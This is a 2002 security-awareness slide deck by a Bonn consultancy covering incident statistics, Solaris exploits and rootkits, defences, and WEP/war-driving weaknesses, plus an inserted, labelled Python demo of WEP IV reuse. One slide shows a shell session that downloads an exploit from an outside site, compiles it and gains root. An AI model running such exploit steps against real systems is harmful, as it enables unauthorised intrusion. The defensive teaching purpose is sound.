We are under attack, aren't we?
Hans Schächl, Senior Consultant, kippdata informationstechnologie GmbH, Bonn
Security-Meeting 2002
kippdata informationstechnologie GmbH, Bornheimer Straße 33a, 53111 Bonn
Phone 0228 98549-0, Fax 0228 98549-50, info@kippdata.de, www.kippdata.de
Problem situation: hosts on the Internet (source: http://www.isc.org/ds/)
Year    Hosts (millions)
1993      1.7
1994      3.2
1995      6.6
1996     12.8
1997     19.5
1998     36.7
1999     56.2
2000     93
2001    125.8
2002    162.1
Problem situation: security-relevant incidents reported to CERT/CC (source: http://www.cert.org/stats/)
Year    Incidents
1988        6
1989      132
1990      252
1991      406
1992      773
1993     1334
1994     2340
1995     2412
1996     2573
1997     2134
1998     3734
1999     8268
2000    21756
2001    52658
2002    86272 (extrapolated from Q1/Q2 2002)
Problem situation: extent of damage
Over US$455 million in 2002, reported by 44% of the respondents!
"For the fifth year in a row, more respondents (74%) cited their Internet connection as a frequent point of attack than cited their internal systems as a frequent point of attack (33%)"
"Seventy percent of those attacked reported vandalism"
(Source: CSI/FBI Computer Crime and Security Survey, 2002)
Problem situation: conclusions
The number of unreported cases is still high
Growing probability of being discovered as a target
The intentions of "attackers" are hardly predictable
Attacks are becoming more professional, tools are freely available
Problem situation: countermeasures in use
Anti-virus (98%)
Firewalls (95%)
Physical security (92%)
Access control (90%)
IDS (61%)
Encryption (53%)
Digital identification (42%)
Biometrics (9%)
Solution...
And now? Feeling safe?
What the firewall doesn't see... local hacks:
$ id
uid=9001(foo) gid=9001(foouser)
$ uname -srp
SunOS 5.7 sparc
$ wget http://anticode.com/solaris-exploits/admtool-26-27.c
$ gcc -o hackthem admtool-26-27.c
$ ./hackthem
Jumping address = efffea90
# id
uid=9001(foo) gid=9001(foouser) euid=0(root)
"Exploits": Now for the fun part! How to hack a box remotely
www.kippdata.de: Sun Solaris 7, Sun UltraSPARC II, default installation, Apache web server
Nightmare: "root compromise". Or, as Tripwire Inc. puts it:
What happened?
login buffer overflow via telnetd: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2f41987 (22.01.2002)
Buffer overflow in cachefsd: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2f44309 (31.05.2002)
"snmpxdmid" allows remote root access: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2f26981 (22.01.2002)
Backdoors: next-generation root kits
Loadable kernel module: hides its own presence and that of other processes and files
Trojan / backdoor, e.g. ICMP root shell, UDP port 53 tunnel, HTTP Trojan
Consequences
Patch management, e.g. Sun Patch Manager: http://www.sun.com/service/support/sw_only/patchmanager.html
Filters, proxies and wrappers for services: stateful firewall, content scanner, tcpwrapper etc.
Hardened OS / RBAC: Sun JASS, ARGUS, Trusted Solaris and co.
Intrusion detection: host-based (Tripwire), network-based (SmartDefense)
"Exploits": no comment...
http://www.google.com
"windows exploits" -> 147,000 hits
"linux exploits" -> 107,000 hits
"solaris exploits" -> 36,300 hits
"Exploits": operating systems out of the box are getting "harder" too
Solaris 2.5.1 -> 30 exploits
11/1996: Phrack #49 appears with Aleph One's "Smashing The Stack For Fun And Profit"
Solaris 2.6 -> 46 exploits
Solaris 7 -> 18 exploits
Solaris 8 -> 2 exploits
Solaris 9 -> still 0...
From war dialing to... John T. Draper AKA Captain Crunch
... war driving!
The new kid in town: wireless insecurity, 802.11 and WEP
Wired Equivalent Privacy isn't!
RC4 isn't bad; its implementation in WEP is...
Who mounts RJ-45 sockets on the building's facade?
For now the only remedies are a VPN at the IP layer or encryption at the application layer
Waiting for WEPv2 / 802.1x?
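The slide's point that RC4 itself is not the problem but its use in WEP is can be made concrete. WEP derives the per-frame RC4 key as a 24-bit IV (sent in the clear) followed by the shared secret key and appends a CRC-32 as its "integrity check". Because a stream cipher is a one-time pad driven by the key, two frames encrypted under the same IV and key use the same keystream, and XORing their ciphertexts cancels the keystream and leaves the XOR of the plaintexts, with the secret key playing no part. A 24-bit IV space is exhausted or repeated quickly on a busy network. The code below is an added example written for this deck, not code from the page or from any WEP implementation; the key, IVs and frame payloads are constructed.

```python
"""RC4 and WEP-style framing: why reusing the 24-bit IV breaks confidentiality.

Added example, not code from the page. Key, IVs and payloads are constructed values.
"""
import math
import struct
import zlib

IV_LEN = 3  # WEP sends a 24-bit IV in the clear in front of every frame


def rc4(key, data):
    """Plain RC4: key-scheduling algorithm, then XOR the data with the keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(secret_key, iv, plaintext):
    """Frame body as WEP builds it: IV in the clear, then RC4(IV || key) over plaintext || CRC-32."""
    assert len(iv) == IV_LEN
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    return iv + rc4(iv + secret_key, plaintext + icv)


def wep_decrypt(secret_key, frame):
    """Undo wep_encrypt; returns (plaintext, icv_ok).
    CRC-32 is linear and unkeyed, so icv_ok only detects transmission noise, not tampering."""
    iv, body = frame[:IV_LEN], frame[IV_LEN:]
    clear = rc4(iv + secret_key, body)
    plaintext, icv = clear[:-4], clear[-4:]
    return plaintext, struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF) == icv


def ciphertext_xor(secret_key, iv1, p1, iv2, p2):
    """XOR of two frame bodies (IV prefix stripped).
    With iv1 == iv2 both frames used the same keystream, which cancels and leaves p1 XOR p2."""
    c1 = wep_encrypt(secret_key, iv1, p1)[IV_LEN:]
    c2 = wep_encrypt(secret_key, iv2, p2)[IV_LEN:]
    return xor_bytes(c1, c2)


def iv_collision_probability(frames):
    """Birthday bound: probability that at least two of `frames` randomly chosen 24-bit IVs coincide."""
    space = 2 ** (8 * IV_LEN)
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * space))


if __name__ == "__main__":
    key = b"\x01\x02\x03\x04\x05"          # constructed 40-bit WEP key
    p1, p2 = b"GET /index.html", b"POST /login.cgi"
    same_iv = ciphertext_xor(key, b"\x00\x00\x01", p1, b"\x00\x00\x01", p2)
    print("same IV, ciphertext XOR == plaintext XOR:", same_iv[:len(p1)] == xor_bytes(p1, p2))
    print("P(IV collision after 5000 frames) =", round(iv_collision_probability(5000), 3))
```

The birthday figure is the defender's reason to treat WEP as cleartext: after a few thousand frames a repeated IV is more likely than not, and many cards simply counted IVs from zero at power-on. The fixes the slide names address exactly this layer, by running a VPN or application-layer encryption with proper per-session keys and a real MAC over the wireless link.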
WEP or not - you're scanned!
vortex, 17.04.2001: "A Co-conspirator (you know who you are ;-) and I have performed initial scans (standing relatively still) in the major London financial district of Canary Wharf, and were shocked to have detected around 150 wireless devices - most of which were not even using WEP."
"Shipley recently sat with a friend in his car in the Silicon Valley parking lot of <company>. They were using laptops loaded with special monitoring software to observe lots of <company>'s traffic, most of it coming from Windows machines. They were able to observe as someone transferred a file and someone else turned on an NT machine and received e-mail."
"a <company> spokeswoman said later that any network heard that day was part of a <company> test, though she didn't know what was being tested, and added that the network was no longer operational."
... and mapped! San Francisco Bay Area
... also in Bonn!
Further reading
Building Internet Firewalls, Chapman and Zwicky, O'Reilly
Practical Unix & Internet Security, Garfinkel and Spafford, O'Reilly
Firewalls and Internet Security, Cheswick and Bellovin, Addison-Wesley
TCP/IP Illustrated, W. Richard Stevens, Addison-Wesley
Cracking DES, Electronic Frontier Foundation, O'Reilly
Applied Cryptography, Bruce Schneier, John Wiley & Sons
SSL and TLS, Eric Rescorla, Addison-Wesley
Intrusion Signatures and Analysis, S. Northcutt, New Riders Pub.
Online resources
Sun Security Products: http://www.sun.com/security/
Sun Recommended and Security Patches: http://sunsolve.sun.com/pub-cgi/show.pl?target=patches/patch-license&nav=pub-patches
Sun JASS Solaris Security Toolkit: http://wwws.sun.com/software/security/jass/
CheckPoint Firewall-1 / VPN-1: http://www.checkpoint.com/
Firewalls mailing list: http://www.netsys.com/firewall.html
Bugtraq mailing list: http://www.securityfocus.com/forums/
Bundesamt für Sicherheit in der Informationstechnik (German Federal Office for Information Security): http://www.bsi.bund.de/
CERT Coordination Center: http://www.cert.org/
"The Design of a Secure Internet Gateway" by Bill Cheswick: http://cm.bell-labs.com/who/ches/papers/gateway.ps
Online resources (continued)
Solaris Fingerprint Database: http://sunsolve.sun.com/pub-cgi/show.pl?target=content/content7
Sun Security BluePrints Online: http://www.sun.com/solutions/blueprints/browsesubject.html#security
Solaris and Tripwire: http://www.sun.com/security/tripwire/
Tripwire for Servers: http://www.tripwire.com/products/servers/index.cfml
ARGUS: http://www.argus-systems.com/product/
WEP: Cypherpunks talk at the Black Hat Briefings 2001: http://www.cypherpunks.ca/bh2001/mgp00001.html
InSecurity of the WEP Algorithm: http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html
AirSnort sources: http://airsnort.sourceforge.net/
War dialing / war driving FAQ: http://www.sans.org/infosecfaq/wireless/war.htm